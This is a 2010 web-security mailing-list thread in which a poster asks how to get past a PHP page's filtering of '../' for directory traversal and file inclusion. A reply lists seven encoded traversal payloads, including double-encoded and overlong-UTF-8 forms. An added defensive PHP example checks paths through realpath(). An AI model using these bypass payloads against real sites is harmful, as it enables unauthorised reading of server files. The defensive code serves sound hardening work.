[WEB SECURITY] ../ filtered

Beatriz Duran beatrizdrn at yahoo.com
Tue Feb 16 09:40:24 EST 2010


Shlomi,

I tried those already, but they and the ones with ".." are rejected; the variable is verifying the string before running it, and with the combination:

%252e%252e/FILENAME this happens:

viewfiles.php?folder=%252e%252e/

The 25s are removed, so the %2e%2e are left but transformed into pure text, so the page reports that the directory %2e%2e doesn't exist; but if I apply purely viewfiles.php?folder=%2e%2e/ the page rejects them and says .. are not allowed.

________________________________
From: Shlomi Narkolayev <shlominar at gmail.com>
To: beatrizdrn at yahoo.com; websecurity at webappsec.org
Sent: Tue, February 16, 2010 12:41:16 AM
Subject: RE: [WEB SECURITY] ../ filtered


Try these:
..%5c..%5cFILENAME
%2e%2e\%2e%2e\FILENAME
..%c0%af..%c0%afFILENAME
..%255c..%255cFILENAME
%252e%252e/FILENAME
..%2f..%2fFILENAME
..%252f..%252fFILENAME


Soon I'll upload to my blog 1400 new variants for directory traversal.

Kind Regards,
Narkolayev Shlomi.

From: Beatriz Duran [mailto:beatrizdrn at yahoo.com]
Sent: Monday, February 15, 2010 9:43 AM
To: websecurity at webappsec.org
Subject: [WEB SECURITY] ../ filtered 
 
Hi, I need to find a vulnerability in a URL that
could be exploited for directory traversal and LFI; the page is working with
PHP but it is filtering /../ and also /%2e%2e/, because the page is using
ISO for Latin characters I can't use Unicode extended because it reinterprets
them with other values; is there another way to work around the filter?
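
The behaviour reported at the top of this thread (a once-decoded "%2e%2e" ends up as a literal directory name that does not exist) is what a defender wants, and it is most reliable when the check is made on the canonical path rather than on the spelling of the input. The following is an added example, not code from the thread or from the application discussed; the function name resolve_folder and the directory layout are assumptions.

```php
<?php
// Added example: hypothetical helper, not the application's code.
// Resolve a request's folder value under $baseDir; null means reject.
function resolve_folder(string $baseDir, string $folder): ?string
{
    // PHP has already URL-decoded the query string once. Never decode
    // again: a leftover "%2e%2e" is then just an odd literal name.
    if (strpos($folder, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "." and ".." and follows symlinks, so the
    // containment test below runs on the canonical path, not the spelling.
    $target = realpath($base . DIRECTORY_SEPARATOR . $folder);
    if ($target === false || !is_dir($target)) {
        return null; // nonexistent, e.g. a literal "%2e%2e" directory
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $base && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null; // canonical path is outside the base directory
    }
    return $target;
}

// Constructed sample tree and constructed inputs (values as PHP sees
// them after its single decode of the query string).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'viewfiles_demo_' . getmypid();
mkdir($root . '/files/reports', 0700, true);
$samples = ['reports', 'reports/..', '..', '../', '%2e%2e/', 'reports/../..'];
foreach ($samples as $s) {
    $r = resolve_folder($root . '/files', $s);
    printf("%-16s %s\n", var_export($s, true), $r === null ? 'rejected' : 'accepted');
}
rmdir($root . '/files/reports');
rmdir($root . '/files');
rmdir($root);
```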